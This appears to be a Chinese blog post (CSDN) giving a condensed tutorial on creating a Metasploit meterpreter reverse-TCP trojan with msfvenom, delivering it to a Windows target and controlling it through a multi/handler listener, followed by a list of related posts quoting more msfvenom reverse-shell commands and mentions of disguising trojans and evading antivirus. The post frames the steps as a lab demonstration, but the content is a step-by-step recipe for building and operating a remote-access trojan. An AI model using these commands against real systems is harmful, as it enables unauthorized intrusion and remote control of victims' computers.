MSF生成木马/Metasploit生成木马并执行监听和控制(精简版)

最新推荐文章于 2025-03-09 16:09:25 发布
最新推荐文章于 2025-03-09 16:09:25 发布
阅读量1.6k 收藏 14
点赞数 13
文章标签: 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62832001/article/details/143847503
版权

我们先来简单熟悉一下过程

命令生成木马---->上传木马----->启动监听模块---->运行木马---->控制主机

第一步:使用msfvenom命令生成木马:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.163.167(攻击机的IP地址) lport=9527(攻击机的监听端口) -f exe(可执行文件后缀) > fanxiang.exe(文件名)

第二步:想办法上传木马

因为这里是演示,所以用一个Windows靶机测试,直接拖到Windows靶机里(反正就是想办法将生成的文件搞到靶机里面去)

第三步:开启监听模块

在kali命令行输入msfconsole命令进入msf界面然后输入search /handler搜索监听模块

输入use 7(跟前面的id)使用模块,然后输入show options查看需要我们设置的选项(黄色标注)

黄色选项从上到下依次是,payload(攻击载荷,就是我们生成木马的时候windows/meterpreter/reverse_tcp这一坨),lhost(攻击机地址),lport(攻击机端口)

注意:这三个选项一定要和生成木马的时候设置的一样

利用set 选项 值的方式来设置选项,设置完后就run开始运行监听

第四步(最后一步):靶机运行文件

这个时候我们Windows靶机直接运行文件就可以直接反弹到我们的攻击机上面

然后返回看kali是否获取到了meterpreter,获取到了就说明成功了

到这一步看到meterpreter就说明成功控制了,然后就可以执行一些相关的命令了(命令挺多的,网上找一下哦)

周小新824
关注
【网络安全】 MSF生成木马教程
一直被模仿,从未被超越
03-13 2172
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 4726
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloadsencoders来生成各种格式的木马文件,在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayloadmsfencode的结合体,可以一步完成负载生成编码免杀的操作。
Msfvenom生成木马实验
m0_74025111的博客
04-24 1620
编码处理型:msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>/root/Desktop /putty.exe -k -f exe -o /tmp/putty_evil.exe生成伪装木马,将payload。
木马免杀之MSFVenom制作木马
最新发布
没有网络安全就没有国家安全
03-09 1376
木马免杀之MSFVenom制作木马
利用MSF生成php,windows,Linux三类木马
2301_76786857的博客
03-19 3028
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloadsencoders来生成各种格式的木马文件,在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayloadmsfencode的结合体,可以一步完成负载生成编码免杀的操作。
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 9903
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
msf生成木马
liu_jia_liang的博客
03-29 1万+
Linux   msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 5115
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
msf生成木马监听windows
11-10
Msf (Metasploit Framework) 是一个广泛使用的开源渗透测试工具,它允许攻击者利用已知漏洞创建控制远程系统。对于生成Windows木马设置监听,你可以按照以下步骤操作: 1. **安装Metasploit**: 首先,你需要...
使用Metasploit生成木马控制Windows系统
weixin_56956399的博客
04-12 2363
使用Metasploit生成木马控制Windows系统
0x09.第九课 Metasploit生成linux木马尝试提权.pdf
06-24
### Metasploit生成Linux木马尝试提权 #### 一、课程背景与目标 本课程旨在通过实际操作,向学员展示如何利用Metasploit框架生成Linux木马尝试进行权限提升的过程。通过本课程的学习,学员将能够掌握以下...
MSF生成木马渗透WIN7
妖魔鬼怪快离开的博客
11-15 5561
生成木马 使用msf模块中的msfvenom模块,生成.exe木马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机IP地址 LPORT=4444 -f exe > /home/tim/桌面/qq.exe 启动msfconsole msfconsole 设置payload参数 //开启监听· use exploit/multi/handler //设置tcp监听 set payload windows/meterpreter/rev
Metasploit (MSF) 使用生成木马payload
2301_79642494的博客
10-29 2305
show: 查看选项 //当进入模块可是使用show option查看模块需要的参数选项,使用show targetsshow payloads可查看targetpayload选项参数。若出现handler failed to bind to说明该端口已经被占用,此时要把靶机的木马文件删除重启靶机(因为木马一旦运行就不会停止,一直占用端口),再从头开始建立木马。如果需要退出删除session会话可以使用session -k 会话号,同样使用-K可以删除全部session会话。
Metasploit生成木马
clown_YZ的博客
02-15 485
Metasploit
利用msf生成木马控制win7
XiaoYeZhu_1314的博客
09-08 672
指定要生成的Payload类型为Windows平台的Meterpreter反向TCP shell。在Kali Linux中使用Metasploitmsfvenom工具生成一个Windows平台的Meterpreter反向TCP shell载荷。在把back.exe拖拽到受害者的主机上(win7如果不能粘贴外来文件,就把虚拟机中的VMware Tools打开安装就行)设置要连接回的IP地址,即指定Meterpreter shell将连接的IP地址。指定生成的文件格式为可执行文件(exe)
【内网安全】——msf木马生成教程
Demo不是emo的博客
01-30 5994
msfvenom生成木马教程
msf-Msfvenonm生成后门木马
热门推荐
weixin_45588247的博客
08-27 2万+
msf-Msfvenonm生成后门木马实验 文章目录msf-Msfvenonm生成后门木马实验一、工具:二、实验环境:三、`msfvenom`简介:四、各平台生成木马的方法:五、生成反向反弹木马:1. windows平台:1.1 生成反弹木马:1.2 捆绑一个程序伪装木马:2. :3. :4. :1.1 :2.1 :五、实验过程:1. :1.1 :1.1.1 : 一、工具: Metasploit Framework(MSF)漏洞利用框架 二、实验环境: 靶   机: windows10虚拟机:192.
msfmsf木马生成大全
qq_20410657的博客
10-08 719
免杀技术全称为反杀毒技术Anti Anti- Virus简称"免杀",它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。本章是通过msfmsfvenom)命令实现免杀的操作。
msf上制作简单的windows exe木马
weixin_73942557的博客
10-25 1179
msf制作Windows可执行程序木马利用。首先利用用组件msfvenom制作木马。然后将生成木马放到你准备的靶机上面。设置payload、监听IP端口。在靶机上运行生成木马文件。进入msfconsole。-p设置payload。然后设置返回IP端口。-f设置生成木马的类型。使用exploit利用。-o设置路径文件名。目前就已经提权成功了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值